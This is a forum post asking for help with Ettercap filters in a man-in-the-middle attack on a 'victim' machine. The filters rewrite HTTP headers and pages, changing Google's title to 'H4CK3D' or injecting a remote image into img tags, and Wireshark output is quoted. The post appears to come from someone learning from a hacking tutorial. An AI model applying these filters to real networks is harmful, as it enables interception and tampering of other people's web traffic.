Hello,

First of all, I'm posting here cos the Ettercap forums don't work (I can't register).

I'm trying to do easy ettercap filter but it doesn't seem to work. The filter is:
Code:
if (ip.proto == TCP && tcp.dst == 80) {
   if (search(DATA.data, "Accept-Encoding")) {
      replace("Accept-Encoding", "Accept-Rubbish!"); # note: replacement string is same length as orig$
      msg("zapped Accept-Encoding!\n");
   }
}

if (ip.proto == TCP && tcp.src == 80) {
   replace("<title>Google</title>", "<title>Google H4CK3D</title>");
   msg("Filter Ran.\n");
}
The MiM attack work (I can see SSL connections.

If I load Google page on the victims computer, the source page still has <title>Google</title>.

In Wireshark I can see one request from the Victim with:

Code:
Accept-Encoding: gzip,deflate\r\n
and then a second one:
Code:
Accept-Rubbish!: gzip,deflate\r\n
but the second request is marked as "TCP out of order". I don't really know what that means.

Then I can see a answer from google containing the "H4CK3D" title. It's again marked as "TCP out of order".

Anyway, the vicitm's Google page does not contain the modified code.

Thanks for your advices.

If I use this filter, from the IronGeek tutorial, it works fine:
Code:
if (ip.proto == TCP && tcp.dst == 80) {
   if (search(DATA.data, "Accept-Encoding")) {
      replace("Accept-Encoding", "Accept-Rubbish!"); 
	  # note: replacement string is same length as original string
      msg("zapped Accept-Encoding!\n");
   }
}
if (ip.proto == TCP && tcp.src == 80) {
   replace("img src=", "img src=\"http://www.irongeek.com/images/jollypwn.png\" ");
   replace("IMG SRC=", "img src=\"http://www.irongeek.com/images/jollypwn.png\" ");
   msg("Filter Ran.\n");
}